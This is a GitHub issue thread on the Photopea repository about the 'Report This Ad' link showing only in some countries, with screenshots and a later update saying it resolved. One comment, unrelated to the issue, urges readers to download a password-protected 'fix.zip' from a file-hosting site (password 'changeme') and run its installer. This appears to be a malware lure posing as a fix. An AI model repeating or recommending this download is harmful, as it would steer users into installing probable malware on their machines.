### ISSUE TITLE
About Hangs

### ISSUE THREAD

**Issue by Mayur-hot** [photopea/photopea#7113]
![Screenshot_2024-08-28_14-39-30](https://github.com/user-attachments/assets/e26f90bc-8a52-4879-91e9-abb27a0b6eb0)

![Screenshot_2024-08-28_14-33-56](https://github.com/user-attachments/assets/80ac06eb-9e5f-48c8-a712-0c60ca41e66a)

I checked website in Private Mode + using VPN

then only I can See Audit Mode with "Report This Ad" Link...

I am from INDIA.. and in India I don't see "Change Consent"... Button below.. so I think Audit -- "Report This Ad" is working for only Specific Countries...

Thank You.

**Comment by TrymenT-AlphA** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Mayur-hot** [comment]
Better to wait for some time.. above fix is for Windows, I am using Linux.. 
I googled and found linux based below command..
https://man7.org/linux/man-pages/man1/ranlib.1.html


But I think problem will be solved soon.. because Ad Report is not working instatanly.. may be soon This problem will be resolved...

Thank You..

**Comment by Mayur-hot** [comment]
![Screenshot_2024-08-28_21-24-33](https://github.com/user-attachments/assets/83e82592-8b52-4fa0-83fb-63aada49f4e7)
Finally "semrush.com" is blocked by Your Ad providers.. this is not shown..and other ads is working fine...
